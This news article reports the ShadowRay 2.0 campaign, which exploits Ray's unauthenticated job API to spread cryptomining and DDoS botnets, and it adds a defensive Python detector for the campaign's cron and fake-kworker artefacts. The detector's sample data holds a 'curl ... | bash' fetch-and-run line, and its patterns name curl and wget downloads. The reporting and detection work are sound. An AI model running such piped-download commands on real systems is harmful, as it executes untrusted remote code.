Oligo Security has warned of an ongoing attack that exploits a two-year-old security flaw in the Ray open source artificial intelligence (AI) framework to turn infected clusters powered by NVIDIA GPUs into self-replicating cryptocurrency mining botnets.
The activity, codenamed ShadowRay 2.0, is an evolution of a previous wave observed between September 2023 and March 2024. At its core, the attack exploits a critical missing authentication bug (CVE-2023-48022, CVSS score: 9.8) to take control of susceptible instances, hijack their computing power, and mine cryptocurrency illicitly using XMRig.
The vulnerability remains unpatched due to a “long-standing design decision” consistent with Ray’s development best practices, which require operations to run in isolated networks and rely on trusted code.
In this campaign, malicious jobs are submitted to the unauthenticated Ray job submission API (‘/api/jobs/’) on exposed dashboards, with commands ranging from simple reconnaissance to complex multi-step Bash and Python payloads. A compromised Ray cluster is then used in a spray-and-pray attack to distribute payloads to other Ray dashboards, essentially creating a worm that can spread from one victim to the next.
The attack is known to utilize GitLab and GitHub to distribute the malware, creating repositories with names like “ironern440-group” and “thisisforwork440-ops” to hide the malicious payload. Both accounts are no longer accessible. However, cybercriminals have responded to takedown efforts by creating new GitHub accounts, demonstrating their tenacity and ability to quickly resume operations.
The payload then leverages the platform’s orchestration capabilities to pivot laterally to non-internet-connected nodes and spread the malware, opens a reverse shell to attacker-controlled infrastructure for remote control, and establishes persistence by running a cron job every 15 minutes that retrieves the latest version of the malware from GitLab to reinfect the host.
Researchers Avi Lumelsky and Gal Elbaz said the attackers “turned Ray’s legitimate orchestration functionality into a tool for a self-propagating global cryptojacking operation, autonomously spreading across exposed Ray clusters.”
The campaign may have used large language models (LLMs) to create the GitLab payloads. This assessment is based on the malware’s “structure, comments, and error handling patterns.”
The infection chain includes an explicit check to see if the victim is in China, and if so, a region-specific version of the malware is served. The malware is also designed to eliminate competition by scanning for and terminating the running processes of other crypto miners, a tactic widely employed by cryptojacking groups to maximize mining profits from their hosts.
Another notable aspect of this attack is that it uses various tactics to remain unnoticed, such as disguising the malicious process as a legitimate Linux kernel worker service and limiting CPU usage to approximately 60%. It is believed that this campaign may have been active since September 2024.
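As an added example (not code from Oligo, Anyscale or the original article), the Python below flags the two host artefacts described above: a cron entry that re-downloads a script from GitLab every 15 minutes, and a user-space process named like a kernel worker. The function names, the `kworker` name pattern and the sample data are assumptions made for illustration; the page gives no exact process name or URL.

```python
import os
import re

# Assumption: the page names no process or URL, so match behaviour, not indicators.
KWORKER = re.compile(r"^\[?kworker")
FETCH = re.compile(r"\b(curl|wget)\b.*\b(gitlab|github)", re.I)

def suspicious_cron(lines):
    """Cron entries on a 15-minute schedule that download from GitLab/GitHub."""
    hits = []
    for line in lines:
        fields = line.split(None, 5)  # five schedule fields, then the command
        if (len(fields) == 6 and not line.lstrip().startswith("#")
                and fields[0] in ("*/15", "0,15,30,45") and FETCH.search(fields[5])):
            hits.append(line.strip())
    return hits

def fake_kernel_workers(procs):
    """PIDs named like kworker that are not children of kthreadd (PID 2) or have an exe."""
    return [p["pid"] for p in procs
            if KWORKER.match(p["comm"]) and (p["ppid"] != 2 or p["exe"])]

def snapshot_procs(root="/proc"):
    """Collect pid, ppid, comm and exe for each live process (Linux)."""
    procs = []
    for pid in filter(str.isdigit, os.listdir(root)):
        try:
            with open(f"{root}/{pid}/stat") as fh:
                stat = fh.read()
            comm = stat[stat.index("(") + 1:stat.rindex(")")]
            ppid = int(stat[stat.rindex(")") + 2:].split()[1])
        except (OSError, ValueError, IndexError):
            continue  # process exited while being read
        try:
            exe = os.readlink(f"{root}/{pid}/exe")
        except OSError:
            exe = None  # kernel thread, or no permission to read the link
        procs.append({"pid": int(pid), "ppid": ppid, "comm": comm, "exe": exe})
    return procs

# Constructed sample data (not taken from the campaign).
SAMPLE_CRON = [
    "0 3 * * * /usr/local/bin/backup.sh",
    "*/15 * * * * curl -fsSL https://gitlab.com/PLACEHOLDER/PLACEHOLDER/-/raw/main/u.sh | bash",
]
SAMPLE_PROCS = [
    {"pid": 41, "ppid": 2, "comm": "kworker/0:1-events", "exe": None},
    {"pid": 9107, "ppid": 1, "comm": "kworker/u8:2", "exe": "/tmp/.cache/kw"},
    {"pid": 812, "ppid": 1, "comm": "sshd", "exe": "/usr/sbin/sshd"},
]
```

On a live Linux host, pass `snapshot_procs()` to `fake_kernel_workers` and the lines of each user's crontab and the files under `/etc/cron.d` to `suspicious_cron`.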
Although Ray is intended to be deployed within a “controlled network environment,” our findings show that users are exposing Ray servers to the Internet, opening up a lucrative attack surface for attackers, who use the open source vulnerability detection tool interact.sh to identify which Ray dashboard IP addresses are exploitable. Over 230,500 Ray servers are publicly accessible.
Anyscale, which originally developed Ray, has released the “Ray Open Ports Checker” tool to verify proper configuration of clusters to prevent accidental exposure. Other mitigation strategies include configuring firewall rules to limit unauthorized access and adding authentication to the Ray dashboard port (8265 by default).
“The attackers deployed sockstress, a TCP state depletion tool, to target production websites. This suggests that the compromised Ray clusters are being weaponized, possibly for denial of service attacks against competing mining pools or other infrastructure,” Oligo said.
“This transforms the operation from pure cryptojacking to a multipurpose botnet. The ability to launch DDoS attacks adds another monetization vector. Attackers can rent out DDoS capacity or use it to eliminate competition. Target port 3333 is commonly used by mining pools, suggesting attacks against rival mining infrastructure.”